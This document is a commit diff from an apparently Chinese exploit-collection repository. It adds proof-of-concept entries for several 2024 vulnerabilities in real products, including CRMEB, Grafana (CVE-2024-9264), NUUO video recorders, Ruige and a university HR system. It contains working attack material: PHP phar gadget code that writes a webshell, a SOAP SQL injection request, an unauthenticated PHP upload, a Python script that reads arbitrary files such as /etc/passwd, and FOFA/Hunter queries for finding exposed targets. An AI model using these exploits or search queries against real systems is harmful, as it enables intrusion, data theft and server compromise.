20241026更新漏洞

Author: wy876

Apache/Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md

@@ -0,0 +1,23 @@
+# Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323)
+
+Apache HertzBeat 是开源的实时监控工具。受影响版本中由于使用漏洞版本的 SnakeYAML v1.32解析用户可控的 yaml 文件，经过身份验证的攻击者可通过 /api/monitors/import、/api/alert/defines/import 接口新增监控类型时配置恶意的 yaml 脚本远程执行任意代码。
+
+## 漏洞复现
+
+访问http://localhost:4200/，admin/hertzbeat登录后台，选择任何监控点击导入监控
+
+![image-20241009211426283.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931543.png)
+
+修改上传yaml文件中的value值：
+
+![image-20241009211949488.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931481.png)
+
+成功执行代码
+
+![image-20241009211904763.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931374.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/612

CRMEB/CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md

@@ -0,0 +1,87 @@
+# CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944)
+
+钟邦科技CRMEB 5.4.0版本中发现一个关键漏洞。受影响的是PublicController.php文件中的get_image_base64函数。参数文件的操作会导致反序列化。攻击可能远程发起。该漏洞已被公开披露并可能被利用。
+
+## fofa
+
+```javascript
+icon_hash="-847565074"
+```
+
+## 漏洞复现
+
+生成phar文件并gzip压缩
+
+```php
+<?php
+
+namespace GuzzleHttp\Cookie{
+
+    class SetCookie {
+
+        function __construct()
+        {
+            $this->data['Expires'] = '<?php phpinfo();?>';
+            $this->data['Discard'] = 0;
+        }
+    }
+
+    class CookieJar{
+        private $cookies = [];
+        private $strictMode;
+        function __construct() {
+            $this->cookies[] = new SetCookie();
+        }
+    }
+
+    class FileCookieJar extends CookieJar {
+        private $filename;
+        private $storeSessionCookies;
+        function __construct() {
+            parent::__construct();
+            $this->filename = "D:/phpstudy/WWW/crmeb/public/shell.php";
+            $this->storeSessionCookies = true;
+        }
+    }
+}
+
+namespace{
+    $exp = new GuzzleHttp\Cookie\FileCookieJar();
+
+    $phar = new Phar('test.phar');
+    $phar -> stopBuffering();
+    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); 
+    $phar -> addFromString('test.txt','test');
+    $phar -> setMetadata($exp);
+    $phar -> stopBuffering();
+    rename('test.phar','test.jpg');
+}
+
+?>
+```
+
+gzip压缩文件
+
+```php
+gzip test.jpg
+```
+
+注册用户上传头像
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250941110.png)
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250941888.png)
+
+触发phar反序列化
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250942476.png)
+
+成功写入
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250942596.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/610

EDU/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞.md

@@ -0,0 +1,30 @@
+# 瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞
+
+瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## hunter
+
+```javascript
+web.body="瑞格智慧心理服务平台"
+```
+
+## poc
+
+```javascript
+POST /NPreenManage/NPreenSMSList.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "RuiGe.WebUi.NPreenSMS/Seach"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <Seach xmlns="RuiGe.WebUi.NPreenSMS">
+      <sqlwhere>and 1=convert(int,user_name())</sqlwhere>
+    </Seach>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20241020214327143](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410202143216.png)

EDU/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md

@@ -0,0 +1,21 @@
+# 高校人力资源管理系统ReportServer存在敏感信息泄露漏洞
+高校人力资源管理系统ReportServer存在敏感信息泄露漏洞
+
+## fofa
+```javascript
+body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729414884399-6be61b88-4e82-42e2-bfb0-451f6e130f92.png)
+
+## poc
+```java
+GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729415182606-37ca16b7-4b31-40ae-b37a-7350c1af4d59.png)
+

Grafana/Grafana表达式远程代码执行(CVE-2024-9264).md

@@ -0,0 +1,157 @@
+# Grafana表达式远程代码执行(CVE-2024-9264)
+
+Grafana 的 SQL 表达式实验功能允许评估包含用户输入的“duckdb”查询。这些查询在传递给“duckdb”之前没有得到充分的净化，从而导致命令注入和本地文件包含漏洞。任何具有 VIEWER 或更高权限的用户都能够执行此攻击。 “duckdb”二进制文件必须存在于 Grafana 的 $PATH 中才能使此攻击起作用；默认情况下，此二进制文件未安装在 Grafana 发行版中。
+
+## 影响版本
+
+Grafana >= v11.0.0 (all v11.x.y are impacted)
+
+## poc
+
+```javascript
+POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q100 HTTP/1.1
+Host: 127.0.0.1:3000
+Content-Type: application/json
+Cookie: grafana_session=a739fa9aeb235f2790f17de00fefe528
+Content-Length: 368
+
+{
+  "from": "1696154400000",
+  "to": "1696345200000",
+  "queries": [
+    {
+      "datasource": {
+        "name": "Expression",
+        "type": "__expr__",
+        "uid": "__expr__"
+      },
+      "expression": "SELECT * FROM read_csv_auto('/etc/passwd');",
+      "hide": false,
+      "refId": "B",
+      "type": "sql",
+      "window": ""
+    }
+  ]
+}
+
+```
+
+![image-20241022092542872](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410220925944.png)
+
+## python
+
+```python
+#!/usr/bin/env python3
+
+"""
+Grafana File Read PoC (CVE-2024-9264)
+Author: z3k0sec // www.zekosec.com
+"""
+
+
+import requests
+import json
+import sys
+import argparse
+
+class Console:
+    def log(self, msg):
+        print(msg, file=sys.stderr)
+
+console = Console()
+
+def msg_success(msg):
+    console.log(f"[SUCCESS] {msg}")
+
+def msg_failure(msg):
+    console.log(f"[FAILURE] {msg}")
+
+def failure(msg):
+    msg_failure(msg)
+    sys.exit(1)
+
+def authenticate(s, url, u, p):
+    res = s.post(f"{url}/login", json={"password": p, "user": u})
+    if res.json().get("message") == "Logged in":
+        msg_success(f"Logged in as {u}:{p}")
+    else:
+        failure(f"Failed to log in as {u}:{p}")
+
+def run_query(s, url, query):
+    query_url = f"{url}/api/ds/query?ds_type=__expr__&expression=true&requestId=1"
+    query_payload = {
+        "from": "1696154400000",
+        "to": "1696345200000",
+        "queries": [
+            {
+                "datasource": {
+                    "name": "Expression",
+                    "type": "__expr__",
+                    "uid": "__expr__"
+                },
+                "expression": query,
+                "hide": False,
+                "refId": "B",
+                "type": "sql",
+                "window": ""
+            }
+        ]
+    }
+
+    res = s.post(query_url, json=query_payload)
+    data = res.json()
+
+    # Handle unexpected response
+    if "message" in data:
+        msg_failure("Unexpected response:")
+        msg_failure(json.dumps(data, indent=4))
+        return None
+
+    # Extract results
+    frames = data.get("results", {}).get("B", {}).get("frames", [])
+
+    if frames:
+        values = [
+            row
+            for frame in frames
+            for row in frame["data"]["values"]
+        ]
+        
+        if values:
+            msg_success("Successfully ran DuckDB query:")
+            return values
+
+    failure("No valid results found.")
+
+def decode_output(values):
+    return [":".join(str(i) for i in row if i is not None) for row in values]
+
+def main(url, user="admin", password="admin", file=None):
+    s = requests.Session()
+    authenticate(s, url, user, password)
+    file = file or "/etc/passwd"
+    escaped_filename = requests.utils.quote(file)
+    query = f"SELECT * FROM read_csv_auto('{escaped_filename}');"
+    content = run_query(s, url, query)
+    if content:
+        msg_success(f"Retrieved file {file}:")
+        for line in decode_output(content):
+            print(line)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Arbitrary File Read in Grafana via SQL Expression (CVE-2024-9264).")
+    parser.add_argument("--url", help="URL of the Grafana instance to exploit")
+    parser.add_argument("--user", default="admin", help="Username to log in as, defaults to 'admin'")
+    parser.add_argument("--password", default="admin", help="Password used to log in, defaults to 'admin'")
+    parser.add_argument("--file", help="File to read on the server, defaults to '/etc/passwd'")
+
+
+    args = parser.parse_args()
+    main(args.url, args.user, args.password, args.file)
+
+```
+
+## 漏洞来源
+
+- https://zekosec.com/blog/file-read-grafana-cve-2024-9264/
+- https://github.com/z3k0sec/File-Read-CVE-2024-9264

NUUO/NUUO网络视频录像机upload.php任意文件上传漏洞.md

@@ -0,0 +1,34 @@
+# NUUO网络视频录像机upload.php任意文件上传漏洞
+
+NUUO网络视频录像机upload.php任意文件上传漏洞，未经身份验证攻击者可通过该漏洞上传恶意文件，造成服务器沦陷。
+
+## fofa
+
+```javascript
+body="www.nuuo.com/eHelpdesk.php"
+```
+
+## poc
+
+```javascript
+POST /upload.php HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Accept-Language: zh-CN
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=--------ok4o88lom
+accept: */*
+Content-Length: 155
+
+----------ok4o88lom
+Content-Disposition: form-data; name="userfile"; filename="test.php"
+
+<?php phpinfo();@unlink(__FILE__);?>
+----------ok4o88lom--
+```
+
+![5c2e597f5b4233b5e694d71104f622e9](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251439472.jpg)